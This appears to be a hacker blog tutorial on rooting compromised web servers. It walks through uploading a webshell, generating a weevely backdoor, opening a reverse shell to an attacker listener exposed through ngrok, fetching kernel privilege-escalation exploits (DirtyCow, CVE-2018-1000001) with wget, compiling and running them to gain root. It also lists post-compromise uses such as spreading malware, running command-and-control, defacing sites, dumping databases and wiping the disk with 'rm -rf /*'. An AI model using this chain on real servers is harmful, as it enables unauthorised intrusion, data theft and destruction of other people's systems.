how to root a server

hlo frands , toxic v3nom here  🙂

i made this tutorial for helping my indian friends who got stuck in server rooting
in this tutorial i will describe how to root server through local root exploit  and some basic concept about server

what is rooting of server ? what should a hacker do after rooting server??

rooting of server basically means to gain whole access of server  ..by gaining acess of server he can do many exploitable things .like spreading malware ,use server as c&c,deface all sites hosted on server ,dump databse, redirect sites ,change content, sudo rm -rf /*( not joking )

requirments for server rooting

1. a good webshell
2. netcat  (if your router doesnt have port forward then use ngrok with netcat becoz server iz on wan network not on ur local network)
3.weevely (its ur choice u can use netcat or weevely  both have same work to do back connect but netcat mast hai )
4.a good target which can be exploitable
5.most important ur brain 😉

so lets start 😛

i assume that u have a good exploitable target and all things which i describe in requirements

first  we need to backconnect the server
backconnect simply allow to execute comand remotely i.e by our terminal

there are 2 ways of doing backconnect
1.weevely
its pre -install tool in kali linux …first go to terminal  and type:
“weevely generate (‘ur pass of backdoor) (‘path of ur backdoor i.e /root/Desktop/v3nom.php)

after typing this command it will show like this
now upload it on ur shelled website after uploading
type command:
“weevely (‘the path of ur web shell in website’) (‘ur pass’)

after hitting enter u will got session i.e u will successfully backconnect to server
now i will tell how to do this with 2nd method

2.netcat
if u have forwarded port then it doesnt need to do anything if u have not port forwarded then use ngrok with netcat

first open terminal and type command ngrok tcp (“ur portwhich u want to forward’) and open again new terminal  and type nc -lnvp ‘jo port ngrok mai forward kya tha’ 😉

now go to webshell and use anyone of the language i prefer python 🙂 and in ip
fill ‘0.tcp.ngrok.io’ and in port fill the port u forwarded with nogrok and hit enter

 

after hitting enter u successfully backconnect to server now its time for rooting

what we need for rooting server a exploit for kernel before exploit wee need to identify version for version type:
uname -a
this command tells us the version of kernel

go and find exploit according to kernel which can  be available on
exploit-db.com
github.com and so many…

if ur server is below 2017 use dirtycow exploit it maybe works 😉

link of dirty cow :

https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

after finding suitable exploit  upload it on website  u can upload it manually or by command

wget   ‘url of exploit’

exaample:

wget  https://https://github.com/5H311-1NJ3C706/local-root-exploits/blob/master/linux/CVE-2018-1000001/RationalLove.c

like this after  BACKCONNECT to server

now its time to compile our exploit for compilation

just give command

$ gcc  'ur exploit' -o 'kuch vi daldo like v3nom'

ex-

gcc   rationallove.c   -o  v3nom

here  gcc is used for compilation and -o sets the name of the output file that GCC produces..that u enters in ‘kuch vi daldo’ XD

now change permision of your exploit by command chmod +x 777

and run exploit  ./v3nom

after sucessfully compiling  u will ask to enter per pass just wait for few seconds

and then put command ‘su’

if u get uid=0(root) gid=0(root) groups=0(root)

UID=0 means, u had got root priviledges and hence can do variety of stuff that i

mentioned upper

ps: sorry for my fucking english

if u have any doubt drop in comment box

toxic v3nom

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *